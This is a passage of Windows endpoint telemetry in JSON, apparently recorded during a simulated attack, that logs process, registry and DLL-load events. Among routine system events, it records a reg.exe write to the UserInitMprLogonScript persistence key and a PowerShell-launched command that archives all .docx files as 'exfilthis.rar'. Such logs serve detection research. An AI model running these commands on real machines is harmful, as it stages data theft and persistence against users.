"unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - 
"process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573415270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573415270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883573415270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883573415270000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": 
"C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883573415270000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment\\UserInitMprLogonScript", - "registry_value": "UserInitMprLogonScript", - "timestamp": 131883573444170000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "process", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883573444170000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "process", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573444170000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2900, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573444370000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573444330000, - "unique_pid": 
"{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573444330000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573444330000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573444330000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573444330000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "process", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573444330000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883573445259984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883573445259984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"rar a -r exfilthis.rar *.docx\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 8008, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573450980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573450890000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, 
- { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573450890000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573450890000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573450890000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573450890000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "event_type": "process", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4696, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573451150000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}", - "unique_ppid": 
"{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "process", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573451200016, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": 
"svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", - "registry_value": "CIMOM", - "timestamp": 131883573453700016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - 
"registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WmiPerfClass.dll", - "image_path": "C:\\Windows\\System32\\wbem\\WmiPerfClass.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wevtapi.dll", - "image_path": "C:\\Windows\\System32\\wevtapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573454170000, - "unique_pid": 
